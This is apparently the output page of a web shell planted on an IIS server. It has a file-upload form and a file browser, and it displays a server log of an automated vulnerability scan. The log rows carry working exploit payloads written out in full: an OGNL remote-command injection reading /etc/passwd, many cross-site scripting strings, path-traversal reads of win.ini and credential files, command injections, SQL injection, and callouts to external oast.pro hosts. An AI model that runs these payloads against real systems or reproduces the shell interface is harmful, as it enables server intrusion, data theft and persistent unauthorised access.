????<!DOCTYPE HTML>

<HTML>

<HEAD>

<title></title>

<style>

body{

font-family: monospace;

font-weight: bold;

font-size: 18px;

background-color: #c5c5c5;

color: #000;

}

#content tr:hover{

background-color: #ccc;

}

#content .first{

background-color: #ccc;

}

#content .first:hover{

background-color: #ccc;

}

table{

border: 3px #000 solid;

}

a{

color: #000;

text-decoration: none;

}

a:hover{

color: #00f;

}

input,select,textarea{

border: 1px #000 solid;

-moz-border-radius: 5px;

-webkit-border-radius:5px;

border-radius:5px;

}

input {

 font-size: 18px;

 font-weight: bold;

 padding: 5px;

}

select {

font-size: 19px

}

textarea {

font-size: 10px

}

td, tr { padding: 2px 5px; }



</style>

</HEAD>

<BODY>

<hr width="920" color="black"/>

<hr width="920" color="black"/><center><p><h2>Your IP : 3.144.235.50</h2></p></center>

<hr width="920" color="black"/>

<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">

<tr><td style="padding: 8px">Current Path : <a href="?path=C:">C:</a>/<a href="?path=C:/inetpub">inetpub</a>/<a href="?path=C:/inetpub/logs">logs</a>/<a href="?path=C:/inetpub/logs/wmsvc">wmsvc</a>/<a href="?path=C:/inetpub/logs/wmsvc/W3SVC1">W3SVC1</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">

Upload File : <input type="file" name="file" />

<input type="submit" value="Upload" />

</form>

</td></tr><tr><td style='padding: 8px'>Current File : C:/inetpub/logs/wmsvc/W3SVC1/ex240105.log</tr></td></table><br /><pre>#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-01-05 00:00:28
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-01-05 00:00:27 103.153.214.94 GET /cs/idcplg IdcService=GET_SEARCH_RESULTS&amp;ResultTemplate=StandardResults&amp;ResultCount=20&amp;FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;&amp;PageName=indext&amp;SortField=dInDate&amp;SortOrder=Desc&amp;ResultsTitle=XXXXXXXXXXXX&lt;svg/onload=alert(document.domain)&gt;&amp;dSecurityGroup&amp;QueryText=(dInDate+&gt;=+%60&lt;$dateCurrent(-7)$&gt;%60)&amp;PageTitle=OO 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 24
2024-01-05 00:00:30 103.153.214.94 GET /cs/idcplg IdcService=GET_SEARCH_RESULTS&amp;ResultTemplate=StandardResults&amp;ResultCount=20&amp;FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;&amp;PageName=indext&amp;SortField=dInDate&amp;SortOrder=Desc&amp;ResultsTitle=AAA&amp;dSecurityGroup&amp;QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&amp;PageTitle=XXXXXXXXXXXX&lt;svg/onload=alert(document.domain)&gt; 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 6
2024-01-05 00:00:53 103.153.214.94 POST / name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 5
2024-01-05 00:01:41 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 9
2024-01-05 00:01:44 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 12
2024-01-05 00:05:11 103.153.214.94 GET /fosagent/repl/download-file basedir=4&amp;filepath=..\..\Windows\win.ini 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 15
2024-01-05 00:05:14 103.153.214.94 GET /fosagent/repl/download-snapshot name=..\..\..\..\..\..\..\Windows\win.ini 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 10
2024-01-05 00:09:00 103.153.214.94 PUT /_users/org.couchdb.user:poc - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 400 0 0 24
2024-01-05 00:09:02 103.153.214.94 GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS /.. 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 8
2024-01-05 00:09:45 103.153.214.94 GET /create_user/ username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 8
2024-01-05 00:10:03 103.153.214.94 GET /webadmin/script command=|%20nslookup%20cmbglsthtacjkv124nvg1antc5t5fxz51.oast.pro 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 8
2024-01-05 00:10:48 103.153.214.94 GET /remote/loginredir redir=javascript:alert(document.domain) 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 8
2024-01-05 00:10:49 103.153.214.94 GET /xda/help/en/default.htm startat=//oast.me 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 6
2024-01-05 00:11:15 103.153.214.94 PUT /poc.jsp/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 12
2024-01-05 00:11:18 103.153.214.94 GET /poc.jsp cmd=cat+%2Fetc%2Fpasswd 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 5
2024-01-05 00:12:10 103.153.214.94 GET /maint/modules/home/index.php lang=english|cat%20/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 12
2024-01-05 00:12:37 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 7
2024-01-05 00:12:41 103.153.214.94 POST /invoker/JMXInvokerServlet/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 7
2024-01-05 00:12:44 103.153.214.94 POST /invoker/EJBInvokerServlet/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 7
2024-01-05 00:12:48 103.153.214.94 POST /invoker/readonly - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 8
2024-01-05 00:13:42 103.153.214.94 GET /carbon/resources/add_collection_ajaxprocessor.jsp collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&amp;parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 9
2024-01-05 00:13:58 103.153.214.94 PUT /2aVH1De50XXmLSBkLfSv5xxNlN1.jsp/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 6
2024-01-05 00:13:59 103.153.214.94 GET /webadmin/pkg command=&lt;script&gt;alert(document.cookie)&lt;/script&gt; 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 5
2024-01-05 00:14:03 103.153.214.94 GET /2aVH1De50XXmLSBkLfSv5xxNlN1.jsp - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 48
2024-01-05 00:14:21 103.153.214.94 GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php file=../../../../../../../LocalConfiguration.php 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 12
2024-01-05 00:14:21 103.153.214.94 GET /forumrunner/request.php d=1&amp;cmd=get_spam_data&amp;postids=-1%27 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 6
2024-01-05 00:14:25 103.153.214.94 GET /boards/forumrunner/request.php d=1&amp;cmd=get_spam_data&amp;postids=-1%27 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 5
2024-01-05 00:14:29 103.153.214.94 GET /board/forumrunner/request.php d=1&amp;cmd=get_spam_data&amp;postids=-1%27 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 11
2024-01-05 00:14:32 103.153.214.94 GET /forum/forumrunner/request.php d=1&amp;cmd=get_spam_data&amp;postids=-1%27 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 8
2024-01-05 00:14:35 103.153.214.94 GET /forums/forumrunner/request.php d=1&amp;cmd=get_spam_data&amp;postids=-1%27 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 6
2024-01-05 00:14:38 103.153.214.94 GET /vb/forumrunner/request.php d=1&amp;cmd=get_spam_data&amp;postids=-1%27 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 6
2024-01-05 00:14:43 103.153.214.94 GET /cgi-bin/webproc getpage=/etc/passwd&amp;var:language=en_us&amp;var:page=wizardfifth 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 7
2024-01-05 00:15:26 103.153.214.94 GET /esp/cms_changeDeviceContext.esp device=aaaaa:a%27&quot;;user|s.&quot;1337&quot;; 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 10
2024-01-05 00:19:41 103.153.214.94 POST /maint/index.php packages 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 bcvt.kontum.gov.vn:8172/maint/index.php?packages 404 7 0 9
2024-01-05 00:19:45 103.153.214.94 GET /maint/modules/home/index.php lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 bcvt.kontum.gov.vn:8172/maint/index.php?packages 404 7 0 36
2024-01-05 00:21:17 103.153.214.94 POST / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 8
2024-01-05 00:21:20 103.153.214.94 GET /2aVH1AUEIzG93Yta408sVZAVynN.php/x0A - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 6
2024-01-05 00:23:23 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 0 0 32
2024-01-05 00:23:27 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../etc/passwd - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 0 0 24
2024-01-05 00:24:40 103.153.214.94 GET /.env - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 12
2024-01-05 00:24:49 103.153.214.94 GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 9
2024-01-05 00:25:43 103.153.214.94 POST /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php %3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 14
2024-01-05 00:26:03 103.153.214.94 GET /CMSInstall/install.aspx - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 7
2024-01-05 00:26:05 103.153.214.94 GET /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 7
2024-01-05 00:27:02 103.153.214.94 POST / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 8
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-01-05 00:43:15
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-01-05 00:43:15 103.153.214.94 GET / author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 9
2024-01-05 00:47:22 103.153.214.94 GET /wp-content/plugins/qards/html2canvasproxy.php url=https://cmbglsthtacjkv124nvgu98n35k466nez.oast.pro 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 10
2024-01-05 00:49:13 103.153.214.94 GET /composer/send_email to=rmyI@sEvR&amp;url=http://cmbglsthtacjkv124nvgypu7jeesyqtnz.oast.pro 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 12
2024-01-05 00:49:29 103.153.214.94 GET /OA_HTML/cabo/jsps/a.jsp _t=fredRC&amp;configName&amp;redirect=%2f%5cinteract.sh 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 12
2024-01-05 00:49:48 103.153.214.94 POST /wls-wsat/RegistrationRequesterPortType - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 9
2024-01-05 00:51:02 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:40.0)+Gecko/20100101+Firefox/40.1&#039;;alert(/XSS/);// - 404 7 0 6
2024-01-05 00:53:03 103.153.214.94 GET /passwordrecovered.cgi id=eEySD 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 14
2024-01-05 00:53:39 103.153.214.94 GET /login.php mid=0&amp;usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 8
2024-01-05 00:54:45 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 18
2024-01-05 00:55:46 103.153.214.94 GET /image/image:/..%2fetc%2fpasswd - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 400 0 0 12
2024-01-05 00:55:52 103.153.214.94 GET /magmi/web/ajax_gettime.php prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 6
2024-01-05 00:55:55 103.153.214.94 OPTIONS / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 4
2024-01-05 00:56:03 103.153.214.94 GET /webmail/ language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 8
2024-01-05 00:56:11 103.153.214.94 GET /system/deviceInfo auth=YWRtaW46MTEK 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 7
2024-01-05 00:56:25 103.153.214.94 GET /current_config/Sha1Account1 - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 11
2024-01-05 00:56:35 103.153.214.94 GET /current_config/passwd - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 18
2024-01-05 00:56:40 103.153.214.94 GET /Telerik.ReportViewer.axd optype=Parameters&amp;bgColor=_000000%22onload=%22prompt(1) 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 6
2024-01-05 00:56:47 103.153.214.94 GET /index.php option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 12
2024-01-05 00:57:20 103.153.214.94 GET /wp-content/plugins/raygun4wp/sendtesterror.php backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 24
2024-01-05 00:58:01 103.153.214.94 GET /wp-json/wp/v2/users/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 9
2024-01-05 00:58:04 103.153.214.94 GET / rest_route=/wp/v2/users/ 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 5
2024-01-05 00:59:27 103.153.214.94 GET /plugins/servlet/oauth/users/icon-uri consumerUri=http://cmbglsthtacjkv124nvg3h1w4tfuczgjh.oast.pro 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 15
2024-01-05 01:02:00 103.153.214.94 POST /clients/editclient.php id=2aVH1ACrwBzaateZzFJZZiOvVEZ&amp;action=update 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 11
2024-01-05 01:02:03 103.153.214.94 GET /logos_clients/2aVH1ACrwBzaateZzFJZZiOvVEZ.php - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 5
2024-01-05 01:03:02 103.153.214.94 POST /integration/saveGangster.action - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 13
2024-01-05 01:03:44 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 8
2024-01-05 01:03:46 103.153.214.94 GET /base_import/static/c:/windows/win.ini - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 400 0 0 13
2024-01-05 01:03:47 103.153.214.94 GET /hw-sys.htm - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 10
2024-01-05 01:03:49 103.153.214.94 GET /base_import/static/etc/passwd - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 9
2024-01-05 01:04:40 103.153.214.94 GET /__ - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 9
2024-01-05 01:05:08 103.153.214.94 GET /cgi-bin/wapopen B1=OK&amp;NO=CAM_16&amp;REFRESH_TIME=Auto_00&amp;FILECAMERA=../../etc/passwd%00&amp;REFRESH_HTML=auto.htm&amp;ONLOAD_HTML=onload.htm&amp;STREAMING_HTML=streaming.htm&amp;NAME=admin&amp;PWD=admin&amp;PIC_SIZE=0 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 8
2024-01-05 01:08:06 103.153.214.94 GET /dumpmdm.cmd - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 11
2024-01-05 01:09:03 103.153.214.94 GET /+CSCOE+/files/file_list.json path=/sessions 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 11 0 10
2024-01-05 01:10:57 103.153.214.94 POST /jolokia/read/getDiagnosticOptions - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 9
2024-01-05 01:11:00 103.153.214.94 POST /cobbler_api - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 8
